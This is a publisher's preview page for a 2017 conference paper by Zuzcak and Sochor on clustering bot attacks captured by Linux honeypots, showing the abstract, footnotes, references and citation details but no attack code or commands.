[go: up one dir, main page]
Skip to main content
Springer Nature Link
Log in

Behavioral Analysis of Bot Activity in Infected Systems Using Honeypots

  • Conference paper
  • First Online:
Computer Networks (CN 2017)

Part of the book series: Communications in Computer and Information Science ((CCIS,volume 718))

Included in the following conference series:

Abstract

New Internet threats emerge on daily basis and honeypots have become widely used for capturing them in order to investigate their activities. The paper focuses on a detailed analysis of the behavior of various attacks agains 7 Linux–based honeypots. The attacks were analyzed according to the threat type, session duration, AS, country and RIR of the attack origin. Clusters of similar objects were formed accordingly and certain typical attack patterns for potential detection automation as well as some aspects of threat dissemination were identified.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Log in via an institution

Subscribe and save

Springer+ Basic
$34.99 /Month
  • Get 10 units per month
  • Download Article/Chapter or eBook
  • 1 Unit = 1 Article or 1 Chapter
  • Cancel anytime
Subscribe now

Buy Now

Chapter
USD 29.95
Price excludes VAT (USA)
  • Available as PDF
  • Read on any device
  • Instant download
  • Own it forever
eBook
USD 39.99
Price excludes VAT (USA)
  • Available as EPUB and PDF
  • Read on any device
  • Instant download
  • Own it forever
Softcover Book
USD 54.99
Price excludes VAT (USA)
  • Compact, lightweight edition
  • Dispatched in 3 to 5 business days
  • Free shipping worldwide - see info

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

Similar content being viewed by others

Notes

  1. 1.

    Available at https://github.com/CZ-NIC/kippo.

  2. 2.

    https://csirt.cz.

  3. 3.

    Details about Kippo detection using the ps x command see in https://github.com/desaster/kippo/issues/39.

  4. 4.

    Possibilities of Kippo detection – see https://github.com/desaster/kippo/issues/190.

  5. 5.

    VirusTotal service – see http://virustotal.com/.

  6. 6.

    CSIRT = Computer Security Incident Response Team.

  7. 7.

    Constituency means a part of the Internet where the CSIRT operates as an authority.

  8. 8.

    Only files with identical SHA1 hash were considered identical.

  9. 9.

    Details are available at http://r-project.org.

  10. 10.

    The unknown category includes ASes with no RIR data available. Usually this is the case for private ASes. Details can be found in IETF RFC 6996 – Autonomous System (AS) Reservation for Private Use available at https://tools.ietf.org/html/rfc6996.

  11. 11.

    Details can be found in https://securingtomorrow.mcafee.com/consumer/family-safety/drive-by-download/.

  12. 12.

    http://blog.malwaremustdie.org/2016/10/mmd-0060-2016-linuxudpfker-and-chinaz.html.

  13. 13.

    According to Softpedia, see http://news.softpedia.com/news/mirai-ddos-trojan-is-the-next-big-threat-for-iot-devices-and-linux-servers-507964.shtml.

References

  1. Sochor, T., Zuzcak, M.: Study of internet threats and attack methods using honeypots and honeynets. In: Kwiecień, A., Gaj, P., Stera, P. (eds.) CN 2014. CCIS, vol. 431, pp. 118–127. Springer, Cham (2014). doi:10.1007/978-3-319-07941-7_12

    Chapter  Google Scholar 

  2. Sochor, T., Zuzcak, M.: Attractiveness study of honeypots and honeynets in internet threat detection. In: Gaj, P., Kwiecień, A., Stera, P. (eds.) CN 2015. CCIS, vol. 522, pp. 69–81. Springer, Cham (2015). doi:10.1007/978-3-319-19419-6_7

    Chapter  Google Scholar 

  3. Almotairi, S., Clark, A., Mohay, G., Zimmermann, J.: Characterization of attackers’ activities in honeypot traffic using principal component analysis. In: 2008 Network and Parallel Computing, pp. 147–154. IEEE (2008). doi:10.1109/NPC.2008.82

  4. Rieck, K., et al.: Automatic analysis of malware behavior using machine learning. J. Comput. Secur. 19(4), 639–668 (2011)

    Article  Google Scholar 

  5. Sokol, P., Andrejko, M.: Deploying honeypots and honeynets: issues of liability. In: Gaj, P., Kwiecień, A., Stera, P. (eds.) CN 2015. CCIS, vol. 522, pp. 92–101. Springer, Cham (2015). doi:10.1007/978-3-319-19419-6_9

    Chapter  Google Scholar 

  6. Skrzewski, M.: About the efficiency of malware monitoring via server-side honeypots. In: Gaj, P., Kwiecień, A., Stera, P. (eds.) CN 2016. CCIS, vol. 608, pp. 132–140. Springer, Cham (2016). doi:10.1007/978-3-319-39207-3_12

    Google Scholar 

  7. Skrzewski, M.: System network activity monitoring for malware threats detection. In: Kwiecień, A., Gaj, P., Stera, P. (eds.) CN 2014. CCIS, vol. 431, pp. 138–146. Springer, Cham (2014). doi:10.1007/978-3-319-07941-7_14

    Chapter  Google Scholar 

  8. Savenko, O., Lysenko, S., Kryshchuk, A., Klots, Y.: Botnet detection technique for corporate area network. In: 2013 Intelligent Data Acquisition and Advanced Computing Systems (IDAACS), pp. 363–368. IEEE (2013). doi:10.1109/IDAACS.2013.6662707

  9. Pomorova, O., Savenko, O., Lysenko, S., Kryshchuk, A., Bobrovnikova, K.: A technique for the botnet detection based on DNS-traffic analysis. In: Gaj, P., Kwiecień, A., Stera, P. (eds.) CN 2015. CCIS, vol. 522, pp. 127–138. Springer, Cham (2015). doi:10.1007/978-3-319-19419-6_12

    Chapter  Google Scholar 

  10. Sochor, T., Zuzcak, M., Bujok, P.: Statistical analysis of attacking autonomous systems. In: International Conference on Cyber Security and Protection of Digital Services, pp. 1–6. IEEE (2016). doi:10.1109/ICUFN.2016.7537159

  11. Spitzner, L.: Honeypots: Tracking Hackers, vol. 1. Addison-Wesley, Reading (2003)

    Google Scholar 

  12. Fichet, B.: Distances and Euclidean distances for presence-absence characters and their application to factor analysis. In: Proceedings of a Workshop Multidimensional Data Analysis 1985, pp. 23–46. DSWO Press, Cambridge (1986)

    Google Scholar 

  13. Jaccard, P.: Etude Comparative de la Distribution dans une Portion des Alpes et du Jura. Bulletin de la Societe Vaudoise des Sciences Naturelle 4 (1901)

    Google Scholar 

  14. Guha, S., Rastogi, R., Shim, K.: ROCK: a robust clustering algorithm for categorical attributes. In: Proceedings of the 15th International Conference on Data Engineering (Cat. No. 99CB36337), pp. 512–521. IEEE (1999). doi:10.1109/ICDE.1999.754967

  15. Koyuturk, M., Grama, A., Ramakrishnan, N.: Compression, clustering, and pattern discovery in very high-dimensional discrete-attribute data sets. IEEE Trans. Knowl. Data Eng. 17(4), 447–461 (2005). doi:10.1109/TKDE.2005.55. http://ieeexplore.ieee.org/document/1401886/

  16. Abdi H., Valentin D.: Multiple Correspondence Analysis. University of Texas at Dallas, Texas (2007). utdallas.edu, http://www.utdallas.edu/~herve/Abdi-MCA2007-pretty.pdf

  17. Jolliffe, I.T.: Principal component analysis and factor analysis. In: Principal Component Analysis. Springer Series in Statistics, pp. 150–166. Springer, New York (2002)

    Google Scholar 

Download references

Acknowledgment

The paper was supported by the project No. SGS08/PrF/2017 Network Services Security of the Student Grant Competition of the University of Ostrava.

Author information

Authors and Affiliations

  1. University of Ostrava, Ostrava, Czech Republic

    Matej Zuzcak & Tomas Sochor

Authors
  1. Matej Zuzcak
    View author publications

    You can also search for this author in PubMed Google Scholar

  2. Tomas Sochor
    View author publications

    You can also search for this author in PubMed Google Scholar

Corresponding author

Correspondence to Matej Zuzcak .

Editor information

Editors and Affiliations

  1. Silesian University of Technology, Gliwice, Poland

    Piotr Gaj

  2. Silesian University of Technology, Gliwice, Poland

    Andrzej Kwiecień

  3. Silesian University of Technology, Gliwice, Poland

    Michał Sawicki

Rights and permissions

Reprints and permissions

Copyright information

© 2017 Springer International Publishing AG

About this paper

Cite this paper

Zuzcak, M., Sochor, T. (2017). Behavioral Analysis of Bot Activity in Infected Systems Using Honeypots. In: Gaj, P., Kwiecień, A., Sawicki, M. (eds) Computer Networks. CN 2017. Communications in Computer and Information Science, vol 718. Springer, Cham. https://doi.org/10.1007/978-3-319-59767-6_10

Download citation

  • DOI: https://doi.org/10.1007/978-3-319-59767-6_10

  • Published:

  • Publisher Name: Springer, Cham

  • Print ISBN: 978-3-319-59766-9

  • Online ISBN: 978-3-319-59767-6

  • eBook Packages: Computer ScienceComputer Science (R0)

Publish with us

Policies and ethics

Search

Navigation